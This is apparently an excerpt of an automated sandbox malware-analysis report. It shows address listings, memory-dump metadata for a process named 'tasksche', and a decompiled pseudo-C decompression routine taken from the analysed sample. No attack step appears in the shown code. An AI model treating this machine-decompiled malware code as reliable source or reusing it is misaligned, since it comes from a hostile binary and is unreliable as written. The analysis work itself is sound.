                                                                                              0x0041808f
                                                                                              0x0041808f
                                                                                              0x00418093
                                                                                              0x00418099
                                                                                              0x0041809f
                                                                                              0x004180a5
                                                                                              0x004180a8
                                                                                              0x004180b0
                                                                                              0x004180b6
                                                                                              0x004180bc
                                                                                              0x004180c0
                                                                                              0x004180c4
                                                                                              0x004180c4
                                                                                              0x004180c9
                                                                                              0x00000000
                                                                                              0x00418093
                                                                                              0x00417f83
                                                                                              0x00417f85
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00417f8b
                                                                                              0x00417f91
                                                                                              0x00417f94
                                                                                              0x00417f97
                                                                                              0x00417f9b
                                                                                              0x00417f9e
                                                                                              0x00417fa1
                                                                                              0x00417fa4
                                                                                              0x00417ff2
                                                                                              0x00417ff5
                                                                                              0x0041801e
                                                                                              0x0041801e
                                                                                              0x00418021
                                                                                              0x00418023
                                                                                              0x00000000
                                                                                              0x00418029
                                                                                              0x00418029
                                                                                              0x00000000
                                                                                              0x00418029
                                                                                              0x00417ff7
                                                                                              0x00417ffa
                                                                                              0x00417ffa
                                                                                              0x00417ffd
                                                                                              0x00418000
                                                                                              0x00418006
                                                                                              0x0041800b
                                                                                              0x0041800f
                                                                                              0x00418013
                                                                                              0x00418016
                                                                                              0x00418019
                                                                                              0x00418019
                                                                                              0x00418019
                                                                                              0x00418019
                                                                                              0x00000000
                                                                                              0x00418000
                                                                                              0x00417ff5
                                                                                              0x00417fa6
                                                                                              0x00417fa9
                                                                                              0x00417fad
                                                                                              0x00417fad
                                                                                              0x00417fb0
                                                                                              0x00417fb2
                                                                                              0x00417fb4
                                                                                              0x00417fb8
                                                                                              0x00417fbd
                                                                                              0x00417fc3
                                                                                              0x00417fc9
                                                                                              0x00417fcf
                                                                                              0x00417fd5
                                                                                              0x00417fdb
                                                                                              0x00417fde
                                                                                              0x00417fe1
                                                                                              0x00417fe4
                                                                                              0x00417fe7
                                                                                              0x00417fea
                                                                                              0x00417fea
                                                                                              0x00417fea
                                                                                              0x00417fed
                                                                                              0x00417fed
                                                                                              0x00417fed
                                                                                              0x00000000
                                                                                              0x00417fa9
                                                                                              0x00417f4d
                                                                                              0x00000000
                                                                                              0x00417f17
                                                                                              0x00417efd
                                                                                              0x00417eff
                                                                                              0x00000000
                                                                                              0x00417eff
                                                                                              0x00417ed2
                                                                                              0x00417ed4
                                                                                              0x00000000
                                                                                              0x00417ed4
                                                                                              0x00417e5e
                                                                                              0x00417e60
                                                                                              0x00417e65
                                                                                              0x00417e6b
                                                                                              0x00417e71
                                                                                              0x00418afc
                                                                                              0x00418afc
                                                                                              0x00418afc
                                                                                              0x00417e77
                                                                                              0x00417e8b
                                                                                              0x00417e92
                                                                                              0x00418ad6
                                                                                              0x00000000
                                                                                              0x00418ad6
                                                                                              0x00000000
                                                                                              0x00417e92
                                                                                              0x00417e79
                                                                                              0x00417e85
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00417e85
                                                                                              0x00417e58
                                                                                              0x00418af1
                                                                                              0x00000000
                                                                                              0x00418af3
                                                                                              0x00417dee
                                                                                              0x00417df5
                                                                                              0x00417dfc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00417e06
                                                                                              0x00417e13
                                                                                              0x00417e1a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00417e1a
                                                                                              0x00000000
                                                                                              0x00417d8d
                                                                                              0x00417d8d
                                                                                              0x00417d90
                                                                                              0x00417d92
                                                                                              0x00417d92
                                                                                              0x00417d9b
                                                                                              0x00417d9e
                                                                                              0x00417da7
                                                                                              0x00417dae
                                                                                              0x00417db2
                                                                                              0x00417db5
                                                                                              0x00417dba
                                                                                              0x00417dbd
                                                                                              0x00417dbd
                                                                                              0x00417dc0
                                                                                              0x00417dca
                                                                                              0x00417dcb
                                                                                              0x00417dcb
                                                                                              0x00417dce
                                                                                              0x00417dce
                                                                                              0x00417dbd
                                                                                              0x00417dd3
                                                                                              0x00417dd4
                                                                                              0x00000000
                                                                                              0x00417d92

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID:
                                                                                              • API String ID: 2102423945-0
                                                                                              • Opcode ID: f2ddf0237e8c887b9397686041efde03e6b7465c6b8aca2acf299e0ee70c85ec
                                                                                              • Instruction ID: ca8e397051957a2ab45e24d4035287d6273771f133136d8253d7927585564b75
                                                                                              • Opcode Fuzzy Hash: f2ddf0237e8c887b9397686041efde03e6b7465c6b8aca2acf299e0ee70c85ec
                                                                                              • Instruction Fuzzy Hash: 5692D5709087859FCB29CF34C4D06E9BBF1AF55308F18C5AED8968B342D738A985CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 98%
                                                                                              			E00414946(void* __ebx, intOrPtr __ecx, signed int _a4) {
                                                                                              				signed char _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				signed char _v24;
                                                                                              				signed int* _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				signed char _v36;
                                                                                              				signed int _v40;
                                                                                              				signed int _v44;
                                                                                              				signed char _v48;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				intOrPtr _t214;
                                                                                              				intOrPtr _t215;
                                                                                              				signed int _t216;
                                                                                              				signed int _t217;
                                                                                              				signed int _t219;
                                                                                              				unsigned int _t220;
                                                                                              				signed int _t223;
                                                                                              				signed int _t224;
                                                                                              				signed int _t226;
                                                                                              				unsigned int _t227;
                                                                                              				signed int _t230;
                                                                                              				signed int _t231;
                                                                                              				signed int _t236;
                                                                                              				unsigned int _t237;
                                                                                              				signed int _t240;
                                                                                              				signed int _t241;
                                                                                              				signed int _t242;
                                                                                              				signed int* _t249;
                                                                                              				signed int _t250;
                                                                                              				signed int _t257;
                                                                                              				unsigned int _t258;
                                                                                              				signed int _t261;
                                                                                              				signed int _t262;
                                                                                              				signed int* _t267;
                                                                                              				unsigned int _t268;
                                                                                              				signed int _t271;
                                                                                              				signed int _t272;
                                                                                              				signed int _t273;
                                                                                              				unsigned int _t274;
                                                                                              				signed int _t277;
                                                                                              				signed int _t278;
                                                                                              				signed int _t279;
                                                                                              				unsigned int _t280;
                                                                                              				signed int _t287;
                                                                                              				unsigned int _t288;
                                                                                              				signed int _t291;
                                                                                              				signed int _t292;
                                                                                              				signed int _t294;
                                                                                              				signed int _t295;
                                                                                              				signed int _t297;
                                                                                              				void* _t302;
                                                                                              				void* _t303;
                                                                                              				signed int* _t306;
                                                                                              				signed int* _t307;
                                                                                              				signed int _t311;
                                                                                              				signed int _t312;
                                                                                              				signed int _t315;
                                                                                              				signed int _t316;
                                                                                              				intOrPtr* _t319;
                                                                                              				signed int _t320;
                                                                                              				signed int _t321;
                                                                                              				intOrPtr _t327;
                                                                                              				signed int* _t328;
                                                                                              				signed int _t331;
                                                                                              				void* _t333;
                                                                                              				signed int _t338;
                                                                                              				void* _t340;
                                                                                              				signed char _t344;
                                                                                              				void* _t347;
                                                                                              				intOrPtr* _t351;
                                                                                              				void* _t352;
                                                                                              				signed int _t355;
                                                                                              				signed int _t358;
                                                                                              				signed int _t363;
                                                                                              				unsigned int _t365;
                                                                                              				void* _t367;
                                                                                              				signed char _t370;
                                                                                              				void* _t373;
                                                                                              				signed int _t378;
                                                                                              				unsigned int _t380;
                                                                                              				void* _t382;
                                                                                              				void* _t384;
                                                                                              				signed int _t387;
                                                                                              				void* _t390;
                                                                                              				void* _t392;
                                                                                              				signed int _t395;
                                                                                              				void* _t398;
                                                                                              				signed int _t402;
                                                                                              				signed short _t403;
                                                                                              				intOrPtr* _t405;
                                                                                              				void* _t406;
                                                                                              				signed int _t409;
                                                                                              				signed int _t415;
                                                                                              				signed int _t416;
                                                                                              				signed int _t420;
                                                                                              				signed int _t421;
                                                                                              				signed int _t427;
                                                                                              				signed int _t429;
                                                                                              				signed int _t432;
                                                                                              				signed int _t433;
                                                                                              				intOrPtr* _t436;
                                                                                              				signed int _t441;
                                                                                              				intOrPtr* _t443;
                                                                                              
                                                                                              				_t303 = __ebx;
                                                                                              				_t441 = _a4;
                                                                                              				_v32 = __ecx;
                                                                                              				if( *((char*)(_t441 + 0x2c)) != 0) {
                                                                                              					L3:
                                                                                              					_t214 =  *((intOrPtr*)(_t441 + 0x18));
                                                                                              					_t443 = _t441 + 4;
                                                                                              					__eflags =  *_t443 -  *((intOrPtr*)(_t441 + 0x24)) + _t214;
                                                                                              					if( *_t443 <=  *((intOrPtr*)(_t441 + 0x24)) + _t214) {
                                                                                              						 *(_t441 + 0x4ad8) =  *(_t441 + 0x4ad8) & 0x00000000;
                                                                                              						_t17 = _t214 - 1; // -1
                                                                                              						_t215 =  *((intOrPtr*)(_t441 + 0x20)) + _t17;
                                                                                              						_t327 =  *((intOrPtr*)(_t441 + 0x4acc)) - 0x10;
                                                                                              						__eflags = _t215 - _t327;
                                                                                              						_v16 = _t215;
                                                                                              						_v20 = _t327;
                                                                                              						_v12 = _t215;
                                                                                              						if(_t215 >= _t327) {
                                                                                              							_v12 = _t327;
                                                                                              						}
                                                                                              						_push(_t303);
                                                                                              						while(1) {
                                                                                              							_t214 =  *_t443;
                                                                                              							__eflags = _t214 - _v12;
                                                                                              							if(_t214 < _v12) {
                                                                                              								goto L15;
                                                                                              							}
                                                                                              							L9:
                                                                                              							__eflags = _t214 - _v16;
                                                                                              							if(__eflags > 0) {
                                                                                              								L97:
                                                                                              								goto L98;
                                                                                              							}
                                                                                              							if(__eflags != 0) {
                                                                                              								L12:
                                                                                              								__eflags = _t214 - _v20;
                                                                                              								if(_t214 < _v20) {
                                                                                              									L14:
                                                                                              									__eflags = _t214 -  *((intOrPtr*)(_t441 + 0x4acc));
                                                                                              									if(_t214 >=  *((intOrPtr*)(_t441 + 0x4acc))) {
                                                                                              										L96:
                                                                                              										 *((char*)(_t441 + 0x4ad3)) = 1;
                                                                                              										goto L97;
                                                                                              									}
                                                                                              									goto L15;
                                                                                              								}
                                                                                              								__eflags =  *((char*)(_t441 + 0x4ad2));
                                                                                              								if( *((char*)(_t441 + 0x4ad2)) == 0) {
                                                                                              									goto L96;
                                                                                              								}
                                                                                              								goto L14;
                                                                                              							}
                                                                                              							__eflags =  *((intOrPtr*)(_t441 + 8)) -  *((intOrPtr*)(_t441 + 0x1c));
                                                                                              							if( *((intOrPtr*)(_t441 + 8)) >=  *((intOrPtr*)(_t441 + 0x1c))) {
                                                                                              								goto L97;
                                                                                              							}
                                                                                              							goto L12;
                                                                                              							L15:
                                                                                              							_t328 = _t441 + 0x4adc;
                                                                                              							_t216 =  *_t328;
                                                                                              							__eflags =  *(_t441 + 0x4ad8) - _t216 - 8;
                                                                                              							if(__eflags > 0) {
                                                                                              								_t295 = _t216 + _t216;
                                                                                              								 *_t328 = _t295;
                                                                                              								_push(_t295 * 0xc);
                                                                                              								_t307 = _t441 + 0x4ad4;
                                                                                              								_push( *_t307);
                                                                                              								_t297 = E0041A594(_t307, _t441, _t443, __eflags);
                                                                                              								 *_t307 = _t297;
                                                                                              								__eflags = _t297;
                                                                                              								if(_t297 == 0) {
                                                                                              									E004063CE(0x4335ac);
                                                                                              								}
                                                                                              							}
                                                                                              							_t217 =  *(_t441 + 0x4ad8);
                                                                                              							_t306 = _t217 * 0xc +  *(_t441 + 0x4ad4);
                                                                                              							_v28 = _t306;
                                                                                              							 *(_t441 + 0x4ad8) = _t217 + 1;
                                                                                              							_t219 = E0040978C(_t443);
                                                                                              							_t415 =  *(_t441 + 0xb4);
                                                                                              							_t220 = _t219 & 0x0000fffe;
                                                                                              							__eflags = _t220 -  *((intOrPtr*)(_t441 + 0x34 + _t415 * 4));
                                                                                              							if(_t220 >=  *((intOrPtr*)(_t441 + 0x34 + _t415 * 4))) {
                                                                                              								_t416 = _t415 + 1;
                                                                                              								_a4 = 0xf;
                                                                                              								__eflags = _t416 - 0xf;
                                                                                              								if(_t416 >= 0xf) {
                                                                                              									L26:
                                                                                              									_t331 =  *(_t443 + 4) + _a4;
                                                                                              									 *_t443 =  *_t443 + (_t331 >> 3);
                                                                                              									_t419 = _a4;
                                                                                              									 *(_t443 + 4) = _t331 & 0x00000007;
                                                                                              									_t333 = 0x10;
                                                                                              									_t223 = (_t220 -  *((intOrPtr*)(_t441 + 0x30 + _a4 * 4)) >> _t333 - _a4) +  *((intOrPtr*)(_t441 + 0x74 + _t419 * 4));
                                                                                              									__eflags = _t223 -  *((intOrPtr*)(_t441 + 0x30));
                                                                                              									if(_t223 >=  *((intOrPtr*)(_t441 + 0x30))) {
                                                                                              										_t223 = 0;
                                                                                              										__eflags = 0;
                                                                                              									}
                                                                                              									_t224 =  *(_t441 + 0xcb8 + _t223 * 2) & 0x0000ffff;
                                                                                              									goto L29;
                                                                                              								}
                                                                                              								_t405 = _t441 + 0x34 + _t416 * 4;
                                                                                              								while(1) {
                                                                                              									__eflags = _t220 -  *_t405;
                                                                                              									if(_t220 <  *_t405) {
                                                                                              										break;
                                                                                              									}
                                                                                              									_t416 = _t416 + 1;
                                                                                              									_t405 = _t405 + 4;
                                                                                              									__eflags = _t416 - 0xf;
                                                                                              									if(_t416 < 0xf) {
                                                                                              										continue;
                                                                                              									}
                                                                                              									goto L26;
                                                                                              								}
                                                                                              								_a4 = _t416;
                                                                                              								goto L26;
                                                                                              							} else {
                                                                                              								_t406 = 0x10;
                                                                                              								_t294 = _t220 >> _t406 - _t415;
                                                                                              								_t409 = ( *(_t294 + _t441 + 0xb8) & 0x000000ff) +  *(_t443 + 4);
                                                                                              								 *_t443 =  *_t443 + (_t409 >> 3);
                                                                                              								 *(_t443 + 4) = _t409 & 0x00000007;
                                                                                              								_t224 =  *(_t441 + 0x4b8 + _t294 * 2) & 0x0000ffff;
                                                                                              								L29:
                                                                                              								__eflags = _t224 - 0x100;
                                                                                              								if(_t224 >= 0x100) {
                                                                                              									__eflags = _t224 - 0x106;
                                                                                              									if(_t224 < 0x106) {
                                                                                              										__eflags = _t224 - 0x100;
                                                                                              										if(_t224 != 0x100) {
                                                                                              											__eflags = _t224 - 0x101;
                                                                                              											if(_t224 != 0x101) {
                                                                                              												 *_t306 = 3;
                                                                                              												_t306[2] = _t224 + 0xfffffefe;
                                                                                              												_t226 = E0040978C(_t443);
                                                                                              												_t420 =  *(_t441 + 0x2d78);
                                                                                              												_t227 = _t226 & 0x0000fffe;
                                                                                              												__eflags = _t227 -  *((intOrPtr*)(_t441 + 0x2cf8 + _t420 * 4));
                                                                                              												if(_t227 >=  *((intOrPtr*)(_t441 + 0x2cf8 + _t420 * 4))) {
                                                                                              													_t421 = _t420 + 1;
                                                                                              													_a4 = 0xf;
                                                                                              													__eflags = _t421 - 0xf;
                                                                                              													if(_t421 >= 0xf) {
                                                                                              														L88:
                                                                                              														_t338 =  *(_t443 + 4) + _a4;
                                                                                              														 *_t443 =  *_t443 + (_t338 >> 3);
                                                                                              														_t424 = _a4;
                                                                                              														 *(_t443 + 4) = _t338 & 0x00000007;
                                                                                              														_t340 = 0x10;
                                                                                              														_t230 = (_t227 -  *((intOrPtr*)(_t441 + 0x2cf4 + _a4 * 4)) >> _t340 - _a4) +  *((intOrPtr*)(_t441 + 0x2d38 + _t424 * 4));
                                                                                              														__eflags = _t230 -  *((intOrPtr*)(_t441 + 0x2cf4));
                                                                                              														if(_t230 >=  *((intOrPtr*)(_t441 + 0x2cf4))) {
                                                                                              															_t230 = 0;
                                                                                              															__eflags = 0;
                                                                                              														}
                                                                                              														_t231 =  *(_t441 + 0x397c + _t230 * 2) & 0x0000ffff;
                                                                                              														L91:
                                                                                              														__eflags = _t231 - 8;
                                                                                              														if(_t231 >= 8) {
                                                                                              															_t344 = (_t231 >> 2) - 1;
                                                                                              															_v8 = _t344;
                                                                                              															_t236 = ((_t231 & 0x00000003 | 0x00000004) << _t344) + 2;
                                                                                              															_a4 = _t236;
                                                                                              															__eflags = _t344;
                                                                                              															if(_t344 > 0) {
                                                                                              																_t237 = E0040978C(_t443);
                                                                                              																_t347 = 0x10;
                                                                                              																_a4 = _a4 + (_t237 >> _t347 - _v8);
                                                                                              																_t240 =  *(_t443 + 4) + _v8;
                                                                                              																 *_t443 =  *_t443 + (_t240 >> 3);
                                                                                              																_t241 = _t240 & 0x00000007;
                                                                                              																__eflags = _t241;
                                                                                              																 *(_t443 + 4) = _t241;
                                                                                              																_t236 = _a4;
                                                                                              															}
                                                                                              														} else {
                                                                                              															_t236 = _t231 + 2;
                                                                                              														}
                                                                                              														L95:
                                                                                              														_t306[1] = _t236;
                                                                                              														while(1) {
                                                                                              															_t214 =  *_t443;
                                                                                              															__eflags = _t214 - _v12;
                                                                                              															if(_t214 < _v12) {
                                                                                              																goto L15;
                                                                                              															}
                                                                                              															goto L9;
                                                                                              														}
                                                                                              													}
                                                                                              													_t351 = _t441 + 0x2cf8 + _t421 * 4;
                                                                                              													while(1) {
                                                                                              														__eflags = _t227 -  *_t351;
                                                                                              														if(_t227 <  *_t351) {
                                                                                              															break;
                                                                                              														}
                                                                                              														_t421 = _t421 + 1;
                                                                                              														_t351 = _t351 + 4;
                                                                                              														__eflags = _t421 - 0xf;
                                                                                              														if(_t421 < 0xf) {
                                                                                              															continue;
                                                                                              														}
                                                                                              														goto L88;
                                                                                              													}
                                                                                              													_a4 = _t421;
                                                                                              													goto L88;
                                                                                              												}
                                                                                              												_t352 = 0x10;
                                                                                              												_t242 = _t227 >> _t352 - _t420;
                                                                                              												_t355 = ( *(_t242 + _t441 + 0x2d7c) & 0x000000ff) +  *(_t443 + 4);
                                                                                              												 *_t443 =  *_t443 + (_t355 >> 3);
                                                                                              												 *(_t443 + 4) = _t355 & 0x00000007;
                                                                                              												_t231 =  *(_t441 + 0x317c + _t242 * 2) & 0x0000ffff;
                                                                                              												goto L91;
                                                                                              											}
                                                                                              											 *_t306 = 2;
                                                                                              											while(1) {
                                                                                              												_t214 =  *_t443;
                                                                                              												__eflags = _t214 - _v12;
                                                                                              												if(_t214 < _v12) {
                                                                                              													goto L15;
                                                                                              												}
                                                                                              												goto L9;
                                                                                              											}
                                                                                              										}
                                                                                              										_push( &_v48);
                                                                                              										E00414290(_v32, _t443);
                                                                                              										_t306[1] = _v48 & 0x000000ff;
                                                                                              										_t306[2] = _v44;
                                                                                              										_t358 = 4;
                                                                                              										 *_t306 = _t358;
                                                                                              										_t427 =  *(_t441 + 0x4ad8);
                                                                                              										_t249 = _t427 * 0xc +  *(_t441 + 0x4ad4);
                                                                                              										 *(_t441 + 0x4ad8) = _t427 + 1;
                                                                                              										 *_t249 = _t358;
                                                                                              										_t249[1] = _v36 & 0x000000ff;
                                                                                              										_t249[2] = _v40;
                                                                                              										while(1) {
                                                                                              											_t214 =  *_t443;
                                                                                              											__eflags = _t214 - _v12;
                                                                                              											if(_t214 < _v12) {
                                                                                              												goto L15;
                                                                                              											}
                                                                                              											goto L9;
                                                                                              										}
                                                                                              									}
                                                                                              									_t250 = _t224 + 0xfffffefa;
                                                                                              									__eflags = _t250 - 8;
                                                                                              									if(_t250 >= 8) {
                                                                                              										_t311 = (_t250 >> 2) - 1;
                                                                                              										_v8 = ((_t250 & 0x00000003 | 0x00000004) << _t311) + 2;
                                                                                              										__eflags = _t311;
                                                                                              										if(_t311 > 0) {
                                                                                              											_t288 = E0040978C(_t443);
                                                                                              											_t398 = 0x10;
                                                                                              											_v8 = _v8 + (_t288 >> _t398 - _t311);
                                                                                              											_t291 =  *(_t443 + 4) + _t311;
                                                                                              											 *_t443 =  *_t443 + (_t291 >> 3);
                                                                                              											_t292 = _t291 & 0x00000007;
                                                                                              											__eflags = _t292;
                                                                                              											 *(_t443 + 4) = _t292;
                                                                                              										}
                                                                                              									} else {
                                                                                              										_v8 = _t250 + 2;
                                                                                              									}
                                                                                              									_v24 = _v8;
                                                                                              									_t257 = E0040978C(_t443);
                                                                                              									_t429 =  *(_t441 + 0xfa0);
                                                                                              									_t258 = _t257 & 0x0000fffe;
                                                                                              									__eflags = _t258 -  *((intOrPtr*)(_t441 + 0xf20 + _t429 * 4));
                                                                                              									if(_t258 >=  *((intOrPtr*)(_t441 + 0xf20 + _t429 * 4))) {
                                                                                              										_t312 = 0xf;
                                                                                              										_t363 = _t429 + 1;
                                                                                              										__eflags = _t363 - _t312;
                                                                                              										if(_t363 >= _t312) {
                                                                                              											L48:
                                                                                              											_t365 =  *(_t443 + 4) + _t312;
                                                                                              											 *(_t443 + 4) = _t365 & 0x00000007;
                                                                                              											 *_t443 =  *_t443 + (_t365 >> 3);
                                                                                              											_t367 = 0x10;
                                                                                              											_t261 = (_t258 -  *((intOrPtr*)(_t441 + 0xf1c + _t312 * 4)) >> _t367 - _t312) +  *((intOrPtr*)(_t441 + 0xf60 + _t312 * 4));
                                                                                              											__eflags = _t261 -  *((intOrPtr*)(_t441 + 0xf1c));
                                                                                              											if(_t261 >=  *((intOrPtr*)(_t441 + 0xf1c))) {
                                                                                              												_t261 = 0;
                                                                                              												__eflags = 0;
                                                                                              											}
                                                                                              											_t262 =  *(_t441 + 0x1ba4 + _t261 * 2) & 0x0000ffff;
                                                                                              											goto L51;
                                                                                              										}
                                                                                              										_t436 = _t441 + 0xf20 + _t363 * 4;
                                                                                              										while(1) {
                                                                                              											__eflags = _t258 -  *_t436;
                                                                                              											if(_t258 <  *_t436) {
                                                                                              												break;
                                                                                              											}
                                                                                              											_t363 = _t363 + 1;
                                                                                              											_t436 = _t436 + 4;
                                                                                              											__eflags = _t363 - 0xf;
                                                                                              											if(_t363 < 0xf) {
                                                                                              												continue;
                                                                                              											}
                                                                                              											goto L48;
                                                                                              										}
                                                                                              										_t312 = _t363;
                                                                                              										goto L48;
                                                                                              									} else {
                                                                                              										_t392 = 0x10;
                                                                                              										_t287 = _t258 >> _t392 - _t429;
                                                                                              										_t395 = ( *(_t287 + _t441 + 0xfa4) & 0x000000ff) +  *(_t443 + 4);
                                                                                              										 *_t443 =  *_t443 + (_t395 >> 3);
                                                                                              										 *(_t443 + 4) = _t395 & 0x00000007;
                                                                                              										_t262 =  *(_t441 + 0x13a4 + _t287 * 2) & 0x0000ffff;
                                                                                              										L51:
                                                                                              										__eflags = _t262 - 4;
                                                                                              										if(_t262 >= 4) {
                                                                                              											_t315 = (_t262 >> 1) - 1;
                                                                                              											_a4 = ((_t262 & 0x00000001 | 0x00000002) << _t315) + 1;
                                                                                              											__eflags = _t315;
                                                                                              											if(_t315 <= 0) {
                                                                                              												L70:
                                                                                              												_t432 = _a4;
                                                                                              												__eflags = _t432 - 0x100;
                                                                                              												if(_t432 <= 0x100) {
                                                                                              													_t370 = _v24;
                                                                                              												} else {
                                                                                              													_t370 = _v8 + 1;
                                                                                              													__eflags = _t432 - 0x2000;
                                                                                              													if(_t432 > 0x2000) {
                                                                                              														_t370 = _t370 + 1;
                                                                                              														__eflags = _t432 - 0x40000;
                                                                                              														if(_t432 > 0x40000) {
                                                                                              															_t370 = _t370 + 1;
                                                                                              														}
                                                                                              													}
                                                                                              												}
                                                                                              												_t267 = _v28;
                                                                                              												 *_t267 = 1;
                                                                                              												_t267[1] = _t370;
                                                                                              												_t267[2] = _t432;
                                                                                              												while(1) {
                                                                                              													_t214 =  *_t443;
                                                                                              													__eflags = _t214 - _v12;
                                                                                              													if(_t214 < _v12) {
                                                                                              														goto L15;
                                                                                              													}
                                                                                              													goto L9;
                                                                                              												}
                                                                                              											}
                                                                                              											__eflags = _t315 - 4;
                                                                                              											if(__eflags < 0) {
                                                                                              												_t268 = E00412AEB(_t443);
                                                                                              												_t373 = 0x20;
                                                                                              												_a4 = _a4 + (_t268 >> _t373 - _t315);
                                                                                              												_t271 =  *(_t443 + 4) + _t315;
                                                                                              												 *_t443 =  *_t443 + (_t271 >> 3);
                                                                                              												_t272 = _t271 & 0x00000007;
                                                                                              												__eflags = _t272;
                                                                                              												 *(_t443 + 4) = _t272;
                                                                                              												goto L70;
                                                                                              											}
                                                                                              											if(__eflags > 0) {
                                                                                              												_t280 = E00412AEB(_t443);
                                                                                              												_t390 = 0x24;
                                                                                              												_a4 = _a4 + (_t280 >> _t390 - _t315 << 4);
                                                                                              												_t320 =  *(_t443 + 4) + _t315 - 4;
                                                                                              												 *_t443 =  *_t443 + (_t320 >> 3);
                                                                                              												_t321 = _t320 & 0x00000007;
                                                                                              												__eflags = _t321;
                                                                                              												 *(_t443 + 4) = _t321;
                                                                                              											}
                                                                                              											_t273 = E0040978C(_t443);
                                                                                              											_t316 =  *(_t441 + 0x1e8c);
                                                                                              											_t274 = _t273 & 0x0000fffe;
                                                                                              											__eflags = _t274 -  *((intOrPtr*)(_t441 + 0x1e0c + _t316 * 4));
                                                                                              											if(_t274 >=  *((intOrPtr*)(_t441 + 0x1e0c + _t316 * 4))) {
                                                                                              												_t433 = 0xf;
                                                                                              												_t378 = _t316 + 1;
                                                                                              												__eflags = _t378 - _t433;
                                                                                              												if(_t378 >= _t433) {
                                                                                              													L65:
                                                                                              													_t380 =  *(_t443 + 4) + _t433;
                                                                                              													 *(_t443 + 4) = _t380 & 0x00000007;
                                                                                              													 *_t443 =  *_t443 + (_t380 >> 3);
                                                                                              													_t382 = 0x10;
                                                                                              													_t277 = (_t274 -  *((intOrPtr*)(_t441 + 0x1e08 + _t433 * 4)) >> _t382 - _t433) +  *((intOrPtr*)(_t441 + 0x1e4c + _t433 * 4));
                                                                                              													__eflags = _t277 -  *((intOrPtr*)(_t441 + 0x1e08));
                                                                                              													if(_t277 >=  *((intOrPtr*)(_t441 + 0x1e08))) {
                                                                                              														_t277 = 0;
                                                                                              														__eflags = 0;
                                                                                              													}
                                                                                              													_t278 =  *(_t441 + 0x2a90 + _t277 * 2) & 0x0000ffff;
                                                                                              													goto L68;
                                                                                              												}
                                                                                              												_t319 = _t441 + 0x1e0c + _t378 * 4;
                                                                                              												while(1) {
                                                                                              													__eflags = _t274 -  *_t319;
                                                                                              													if(_t274 <  *_t319) {
                                                                                              														break;
                                                                                              													}
                                                                                              													_t378 = _t378 + 1;
                                                                                              													_t319 = _t319 + 4;
                                                                                              													__eflags = _t378 - 0xf;
                                                                                              													if(_t378 < 0xf) {
                                                                                              														continue;
                                                                                              													}
                                                                                              													goto L65;
                                                                                              												}
                                                                                              												_t433 = _t378;
                                                                                              												goto L65;
                                                                                              											} else {
                                                                                              												_t384 = 0x10;
                                                                                              												_t279 = _t274 >> _t384 - _t316;
                                                                                              												_t387 = ( *(_t279 + _t441 + 0x1e90) & 0x000000ff) +  *(_t443 + 4);
                                                                                              												 *_t443 =  *_t443 + (_t387 >> 3);
                                                                                              												 *(_t443 + 4) = _t387 & 0x00000007;
                                                                                              												_t278 =  *(_t441 + 0x2290 + _t279 * 2) & 0x0000ffff;
                                                                                              												L68:
                                                                                              												_a4 = _a4 + _t278;
                                                                                              												goto L70;
                                                                                              											}
                                                                                              										}
                                                                                              										_a4 = _t262 + 1;
                                                                                              										goto L70;
                                                                                              									}
                                                                                              								}
                                                                                              								__eflags =  *(_t441 + 0x4ad8) - 1;
                                                                                              								if( *(_t441 + 0x4ad8) <= 1) {
                                                                                              									L34:
                                                                                              									 *_t306 =  *_t306 & 0x00000000;
                                                                                              									_t306[2] = _t224;
                                                                                              									_t236 = 0;
                                                                                              									goto L95;
                                                                                              								}
                                                                                              								__eflags =  *(_t306 - 0xc);
                                                                                              								if( *(_t306 - 0xc) != 0) {
                                                                                              									goto L34;
                                                                                              								}
                                                                                              								_t402 =  *(_t306 - 8) & 0x0000ffff;
                                                                                              								__eflags = _t402 - 3;
                                                                                              								if(_t402 >= 3) {
                                                                                              									goto L34;
                                                                                              								}
                                                                                              								_t403 = _t402 + 1;
                                                                                              								 *(_t306 - 8) = _t403;
                                                                                              								 *((_t403 & 0x0000ffff) + _t306 - 4) = _t224;
                                                                                              								 *(_t441 + 0x4ad8) =  *(_t441 + 0x4ad8) - 1;
                                                                                              								continue;
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						 *((char*)(_t441 + 0x4ad0)) = 1;
                                                                                              						L98:
                                                                                              						return _t214;
                                                                                              					}
                                                                                              				} else {
                                                                                              					 *((char*)(_t441 + 0x2c)) = 1;
                                                                                              					_t302 = E0041462B(__ebx, __ecx, _t441 + 4, _t441 + 0x18, _t441 + 0x30);
                                                                                              					if(_t302 != 0) {
                                                                                              						goto L3;
                                                                                              					} else {
                                                                                              						 *((char*)(_t441 + 0x4ad0)) = 1;
                                                                                              						return _t302;
                                                                                              					}
                                                                                              				}
                                                                                              			}














































































































                                                                                              0x00414946
                                                                                              0x0041494d
                                                                                              0x00414954
                                                                                              0x00414957
                                                                                              0x0041497e
                                                                                              0x0041497e
                                                                                              0x00414985
                                                                                              0x0041498a
